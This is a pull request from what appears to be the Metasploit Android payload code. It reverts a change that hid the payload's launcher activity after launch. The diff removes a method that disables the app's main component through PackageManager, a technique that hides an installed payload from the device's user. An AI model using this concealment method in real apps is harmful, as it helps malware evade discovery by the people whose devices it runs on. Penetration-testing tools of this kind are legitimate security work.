### PR TITLE
Revert "hide activity after launch"

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@@ -1,27 +1,14 @@
 package com.metasploit.stage;
 
 import android.app.Activity;
-import android.content.ComponentName;
 import android.content.Intent;
-import android.content.pm.PackageManager;
 import android.os.Bundle;
 
 public class MainActivity extends Activity {
-
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
         startService(new Intent(this, MainService.class));
-        disableActivity();
         finish();
-    }
-
-    private void disableActivity() {
-        PackageManager packageManager = getPackageManager();
-        ComponentName componentName = new ComponentName(getApplicationContext(),
-                MainActivity.class);
-        packageManager.setComponentEnabledSetting(componentName,
-                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
-                PackageManager.DONT_KILL_APP);
     }
 }


### PR DESCRIPTION
This reverts commit 8c752b46f0832c690ef0b628d3e710473ce992a7.
After discussion in https://github.com/rapid7/metasploit-framework/issues/7386 let's revert this change for now. I can make it configurable later on.